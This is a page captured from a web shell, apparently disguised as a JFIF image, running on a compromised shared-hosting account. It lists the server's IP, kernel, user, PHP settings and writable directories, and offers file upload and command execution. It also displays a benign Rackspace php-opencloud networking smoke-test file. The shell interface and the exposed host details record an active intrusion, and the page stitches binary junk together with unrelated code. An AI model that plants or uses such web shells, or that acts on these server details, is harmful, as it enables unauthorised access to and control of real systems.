����JFIF��x�x����'403WebShell
403Webshell
Server IP : 78.140.185.180  /  Your IP : 216.73.216.82
Web Server : LiteSpeed
System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : builderbox ( 1072)
PHP Version : 7.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/builderbox/www/vendor/rackspace/php-opencloud/tests/OpenCloud/Smoke/Unit/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/builderbox/www/vendor/rackspace/php-opencloud/tests/OpenCloud/Smoke/Unit/Networking.php
<?php
/**
 * Copyright 2012-2014 Rackspace US, Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

namespace OpenCloud\Smoke\Unit;

use OpenCloud\Smoke\Utils;

/**
 * Description of Networking
 *
 * @link
 */
class Networking extends AbstractUnit implements UnitInterface
{
    protected $cleanupNetworkIds           = array();
    protected $cleanupSubnetIds            = array();
    protected $cleanupPortIds              = array();
    protected $cleanupSecurityGroupIds     = array();
    protected $cleanupSecurityGroupRuleIds = array();

    public function setupService()
    {
        return $this->getConnection()->networkingService('cloudNetworks', Utils::getRegion());
    }

    public function main()
    {
        $this->testNetworkOperations();
        $this->testSubnetOperations();
        $this->testPortOperations();
        $this->testSecurityGroupOperations();
        $this->testSecurityGroupRuleOperations();
    }

    protected function testNetworkOperations()
    {
        $this->step('Create network');
        $createdNetwork = $this->getService()->createNetwork(array(
            'name' => 'test_network'
        ));
        $this->stepInfo('Network ID: ' . $createdNetwork->getId());
        $this->stepInfo('Network Name: ' . $createdNetwork->getName());
        $this->cleanupNetworkIds[] = $createdNetwork->getId();

        // The next operation is commented out (for now) because the Rackspace
        // Networking API does not support bulk operations (for now). When that
        // changes in the future, please uncomment this operation.
        // $this->step('Create networks');
        // $createdNetworks = $this->getService()->createNetworks(array(
        //     array( 'name' => 'test_network_1' ),
        //     array( 'name' => 'test_network_2' ),
        //     array( 'name' => 'test_network_3' ),
        // ));
        // $this->stepInfo('%-40s | %s', 'Network ID', 'Network name');
        // $this->stepInfo('%-40s | %s', str_repeat('-', 40), str_repeat('-', 40));
        // foreach ($createdNetworks as $network) {
        //     $this->stepInfo('%-40s | %s', $network->getId(), $network->getName());
        //     $this->cleanupNetworkIds[] = $network->getId();
        // }

        $this->step('List networks');
        $networks = $this->getService()->listNetworks();
        $this->stepInfo('%-40s | %s', 'Network ID', 'Network name');
        $this->stepInfo('%-40s | %s', str_repeat('-', 40), str_repeat('-', 40));
        foreach ($networks as $network) {
            $this->stepInfo('%-40s | %s', $network->getId(), $network->getName());
        }

        $this->step('Get network');
        $network = $this->getService()->getNetwork($createdNetwork->getId());
        $this->stepInfo('Network ID: ' . $network->getId());
        $this->stepInfo('Network Name: ' . $network->getName());

        $this->step('Update network');
        $network->update(array(
            'name' => 'updated_test_network'
        ));
    }

    protected function testSubnetOperations()
    {
        $network1 = $this->getService()->createNetwork(array(
            'name' => 'test_network_for_test_subnet'
        ));
        $this->cleanupNetworkIds[] = $network1->getId();

        $this->step('Create subnet');
        $subnet = $this->getService()->createSubnet(array(
            'cidr'      => '192.168.199.0/24',
            'networkId' => $network1->getId(),
            'ipVersion' => 4,
            'name'      => 'test_subnet'
        ));
        $this->stepInfo('Subnet ID: ' . $subnet->getId());
        $this->stepInfo('Subnet Name: ' . $subnet->getName());
        $this->cleanupSubnetIds[] = $subnet->getId();

        $network2 = $this->getService()->createNetwork(array(
            'name' => 'test_network_for_test_subnet_w_gateway'
        ));
        $this->cleanupNetworkIds[] = $network2->getId();

        $this->step('Create subnet with gateway IP');
        $subnet = $this->getService()->createSubnet(array(
            'cidr'      => '192.168.62.0/25',
            'networkId' => $network2->getId(),
            'ipVersion' => 4,
            'name'      => 'test_subnet_with_gateway_ip',
            'gatewayIp' => '192.168.62.128'
        ));
        $this->stepInfo('Subnet ID: ' . $subnet->getId());
        $this->stepInfo('Subnet Name: ' . $subnet->getName());
        $this->cleanupSubnetIds[] = $subnet->getId();

        $network3 = $this->getService()->createNetwork(array(
            'name' => 'test_network_for_test_subnet_w_host_rt'
        ));
        $this->cleanupNetworkIds[] = $network3->getId();

        $this->step('Create subnet with host routes');
        $subnet = $this->getService()->createSubnet(array(
            'cidr'       => '192.168.62.0/25',
            'networkId'  => $network3->getId(),
            'ipVersion'  => 4,
            'name'       => 'test_subnet_with_host_routes',
            'hostRoutes' => array(
                array(
                    'destination' => '1.1.1.0/24',
                    'nexthop'     => '192.168.19.20'
                )
            )
        ));
        $this->stepInfo('Subnet ID: ' . $subnet->getId());
        $this->stepInfo('Subnet Name: ' . $subnet->getName());
        $this->cleanupSubnetIds[] = $subnet->getId();

        // The next operation is commented out (for now) because the Rackspace
        // Networking API does not support bulk operations (for now). When that
        // changes in the future, please uncomment this operation.
        // $this->step('Create subnets');
        // $subnets = $this->getService()->createSubnets(array(
        //     array(
        //         'cidr'      => '192.168.199.0/24',
        //         'networkId' => $network->getId(),
        //         'ipVersion' => 4,
        //         'name'      => 'test_subnet_1'
        //     )
        // ));
        // $this->stepInfo('%-40s | %s', 'Subnet ID', 'Subnet name');
        // $this->stepInfo('%-40s | %s', str_repeat('-', 40), str_repeat('-', 40));
        // foreach ($subnets as $subnet) {
        //     $this->stepInfo('%-40s | %s', $subnet->getId(), $subnet->getName());
        //     $this->cleanupSubnetIds[] = $subnet->getId();
        // }

        $this->step('List subnets');
        $subnets = $this->getService()->listSubnets();
        $this->stepInfo('%-40s | %s', 'Subnet ID', 'Subnet name');
        $this->stepInfo('%-40s | %s', str_repeat('-', 40), str_repeat('-', 40));
        foreach ($subnets as $subnet) {
            $this->stepInfo('%-40s | %s', $subnet->getId(), $subnet->getName());
        }

        $this->step('Get subnet');
        $subnet = $this->getService()->getSubnet($subnet->getId());
        $this->stepInfo('Subnet ID: ' . $subnet->getId());
        $this->stepInfo('Subnet Name: ' . $subnet->getName());

        $this->step('Update subnet');
        $subnet->update(array(
            'name' => 'updated_test_subnet',
            'hostRoutes' => array(
                array(
                    'destination' => '1.1.1.0/24',
                    'nexthop'     => '192.168.17.19'
                )
            ),
            'gatewayIp' => '192.168.62.155'
        ));
    }

    protected function testPortOperations()
    {
        $network1 = $this->getService()->createNetwork(array(
            'name' => 'test_network_for_test_port'
        ));
        $this->cleanupNetworkIds[] = $network1->getId();

        $subnet1 = $this->getService()->createSubnet(array(
            'cidr'      => '192.168.62.0/25',
            'networkId' => $network1->getId(),
            'ipVersion'  => 4,
            'name'      => 'test_subnet_for_test_port'
        ));
        $this->cleanupSubnetIds[] = $subnet1->getId();

        $this->step('Create port');
        $port = $this->getService()->createPort(array(
            'networkId' => $network1->getId(),
            'name'      => 'test_port'
        ));
        $this->stepInfo('Port ID: ' . $port->getId());
        $this->stepInfo('Port Name: ' . $port->getName());
        $this->cleanupPortIds[] = $port->getId();

        // The next operation is commented out (for now) because the Rackspace
        // Networking API does not support bulk operations (for now). When that
        // changes in the future, please uncomment this operation.
        // $this->step('Create ports');
        // $ports = $this->getService()->createPorts(array(
        // ));
        // $this->stepInfo('%-40s | %s', 'Port ID', 'Port name');
        // $this->stepInfo('%-40s | %s', str_repeat('-', 40), str_repeat('-', 40));
        // foreach ($ports as $port) {
        //     $this->stepInfo('%-40s | %s', $port->getId(), $port->getName());
        //     $this->cleanupPortIds[] = $port->getId();
        // }

        $this->step('List ports');
        $ports = $this->getService()->listPorts();
        $this->stepInfo('%-40s | %s', 'Port ID', 'Port name');
        $this->stepInfo('%-40s | %s', str_repeat('-', 40), str_repeat('-', 40));
        foreach ($ports as $port) {
            $this->stepInfo('%-40s | %s', $port->getId(), $port->getName());
        }

        $this->step('Get port');
        $port = $this->getService()->getPort($port->getId());
        $this->stepInfo('Port ID: ' . $port->getId());
        $this->stepInfo('Port Name: ' . $port->getName());

        $this->step('Update port');
        $port->update(array(
            'name'     => 'updated_test_port'
        ));
    }

    protected function testSecurityGroupOperations()
    {
        $this->step('Create security group');
        $securityGroup = $this->getService()->createSecurityGroup(array(
            'name' => 'new-webservers',
            'description' => 'security group for webservers'
        ));
        $this->stepInfo('Security Group ID: ' . $securityGroup->getId());
        $this->stepInfo('Security Group Name: ' . $securityGroup->getName());
        $this->cleanupSecurityGroupIds[] = $securityGroup->getId();

        $this->step('List security groups');
        $securityGroups = $this->getService()->listSecurityGroups();
        $this->stepInfo('%-40s | %s', 'Security Group ID', 'Security Group name');
        $this->stepInfo('%-40s | %s', str_repeat('-', 40), str_repeat('-', 40));
        foreach ($securityGroups as $securityGroup) {
            $this->stepInfo('%-40s | %s', $securityGroup->getId(), $securityGroup->getName());
        }

        $this->step('Get security group');
        $securityGroup = $this->getService()->getSecurityGroup($securityGroup->getId());
        $this->stepInfo('Security Group ID: ' . $securityGroup->getId());
        $this->stepInfo('Security Group Name: ' . $securityGroup->getName());

        $network1 = $this->getService()->createNetwork(array(
            'name' => 'test_network_for_test_port_sg'
        ));
        $this->cleanupNetworkIds[] = $network1->getId();

        $subnet1 = $this->getService()->createSubnet(array(
            'cidr'      => '192.165.66.0/25',
            'networkId' => $network1->getId(),
            'ipVersion'  => 4,
            'name'      => 'test_subnet_for_test_port_sg'
        ));
        $this->cleanupSubnetIds[] = $subnet1->getId();

        $port1 = $this->getService()->createPort(array(
            'networkId' => $network1->getId(),
            'name'      => 'test_port_for_test_port_sg'
        ));
        $this->cleanupPortIds[] = $port1->getId();

        $this->step('Apply security group to port');
        $port1->update(array(
            'securityGroups' => array($securityGroup->getId())
        ));
    }

    protected function testSecurityGroupRuleOperations()
    {
        $securityGroup1 = $this->getService()->createSecurityGroup(array(
            'name' => 'test_security_group_for_test_security_group_rule'
        ));
        $this->cleanupSecurityGroupIds[] = $securityGroup1->getId();

        $this->step('Create security group rule');
        $securityGroupRule = $this->getService()->createSecurityGroupRule(array(
            'securityGroupId' => $securityGroup1->getId(),
            'direction'       => 'ingress',
            'ethertype'       => 'IPv4',
            'portRangeMin'    => 80,
            'portRangeMax'    => 80,
            'protocol'        => 'tcp'
        ));
        $this->stepInfo('Security Group Rule ID: ' . $securityGroupRule->getId());
        $this->stepInfo('Security Group Rule Direction: ' . $securityGroupRule->getDirection());
        $this->cleanupSecurityGroupRuleIds[] = $securityGroupRule->getId();

        $this->step('List security group rules');
        $securityGroupRules = $this->getService()->listSecurityGroupRules();
        $this->stepInfo('%-40s | %s', 'Security Group Rule ID', 'Security Group Rule direction');
        $this->stepInfo('%-40s | %s', str_repeat('-', 40), str_repeat('-', 40));
        foreach ($securityGroupRules as $securityGroupRule) {
            $this->stepInfo('%-40s | %s', $securityGroupRule->getId(), $securityGroupRule->getDirection());
        }

        $this->step('Get security group rule');
        $securityGroupRule = $this->getService()->getSecurityGroupRule($securityGroupRule->getId());
        $this->stepInfo('Security Group Rule ID: ' . $securityGroupRule->getId());
        $this->stepInfo('Security Group Rule Direction: ' . $securityGroupRule->getDirection());
    }

    public function teardown()
    {
        foreach ($this->cleanupSecurityGroupRuleIds as $securityGroupRuleId) {
            $securityGroupRule = $this->getService()->getSecurityGroupRule($securityGroupRuleId);
            $securityGroupRule->delete();
        }

        foreach ($this->cleanupSecurityGroupIds as $securityGroupId) {
            $securityGroup = $this->getService()->getSecurityGroup($securityGroupId);
            $securityGroup->delete();
        }

        foreach ($this->cleanupPortIds as $portId) {
            $port = $this->getService()->getPort($portId);
            $port->delete();
        }

        foreach ($this->cleanupSubnetIds as $subnetId) {
            $subnet = $this->getService()->getSubnet($subnetId);
            $subnet->delete();
        }

        foreach ($this->cleanupNetworkIds as $networkId) {
            $network = $this->getService()->getNetwork($networkId);
            $network->delete();
        }
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit